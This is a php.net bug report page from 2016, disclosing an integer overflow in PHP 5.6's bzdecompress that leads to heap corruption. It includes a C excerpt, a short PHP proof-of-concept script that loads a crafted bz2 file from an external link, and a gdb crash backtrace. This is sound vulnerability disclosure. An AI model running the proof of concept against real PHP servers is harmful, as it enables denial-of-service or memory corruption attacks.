|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-08-16 06:18 UTC] stas@php.net
-Assigned To:
+Assigned To: stas
[2016-08-16 06:18 UTC] stas@php.net
[2016-08-16 07:17 UTC] minhrau dot vc dot 365 at gmail dot com
[2016-08-17 05:57 UTC] stas@php.net
[2016-08-17 05:57 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2016-08-17 08:23 UTC] stas@php.net
[2016-08-17 08:23 UTC] stas@php.net
[2016-08-17 09:15 UTC] laruence@php.net
[2016-08-17 09:15 UTC] laruence@php.net
[2016-08-17 12:04 UTC] ab@php.net
[2016-08-18 11:15 UTC] tyrael@php.net
[2016-10-17 10:09 UTC] bwoebi@php.net
[2016-10-17 10:09 UTC] bwoebi@php.net
[2017-02-13 01:56 UTC] stas@php.net
-Type: Security
+Type: Bug
[2020-09-11 09:02 UTC] mail at 55opt dot org
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Sat Nov 23 09:01:28 2024 UTC |
Description: ------------ In bzdecompress function, result length was not be checked, so the function will return a string with length > INT_MAX. This result can be used some where else and caused heap corruption. Check PoC below. static PHP_FUNCTION(bzdecompress) { ... bzs.avail_out = source_len; size = (bzs.total_out_hi32 * (unsigned int) -1) + bzs.total_out_lo32; dest = safe_erealloc(dest, 1, bzs.avail_out+1, (size_t) size );// the result of dest is the string with length > INT_MAX bzs.next_out = dest + size; } ... Test script: --------------- <?php ini_set('memory_limit', -1); $bzstr = file_get_contents("bz.txt"); //bz.txt download here: https://mega.nz/#!Lk9TRQLQ!rNsKNalS77X_GujsMrhZX-KOI4tv5mT-CjgQbbX_OSc var_dump(strlen($bzstr)); $str1 = bzdecompress($bzstr); var_dump(strlen($str1)); chunk_split($str1, 11, $str1); ?> Expected result: ---------------- No crash Actual result: -------------- Starting program: /home/minhrau/PHP-5.6.24/sapi/cli/php testbbz2_negativelength.php [Thread debugging using libthread_db enabled] Using host libthread_db library "/usr/lib/libthread_db.so.1". int(138533) int(-1431655772) Program received signal SIGSEGV, Segmentation fault. 0x00007ffff1d92f78 in __memcpy_avx_unaligned () from /usr/lib/libc.so.6 (gdb) bt #0 0x00007ffff1d92f78 in __memcpy_avx_unaligned () from /usr/lib/libc.so.6 #1 0x00000000006b053f in zif_chunk_split (ht=<optimized out>, return_value=0x7ffff7fa4330, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/minhrau/PHP-5.6.24/ext/standard/string.c:2221 #2 0x00000000007f908d in zend_do_fcall_common_helper_SPEC (execute_data=<optimized out>) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:558 #3 0x0000000000783b4e in execute_ex (execute_data=0x7ffff7f6f218) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:363 #4 0x000000000074ed41 in zend_execute_scripts (type=type@entry=8, retval=retval@entry=0x0, file_count=file_count@entry=3) at /home/minhrau/PHP-5.6.24/Zend/zend.c:1341 #5 0x00000000006ed0d0 in php_execute_script (primary_file=primary_file@entry=0x7fffffffd0e0) at /home/minhrau/PHP-5.6.24/main/main.c:2613 #6 0x00000000007faa97 in do_cli (argc=2, argv=0xf8c960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:994 #7 0x00000000004361e4 in main (argc=2, argv=0xf8c960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:1378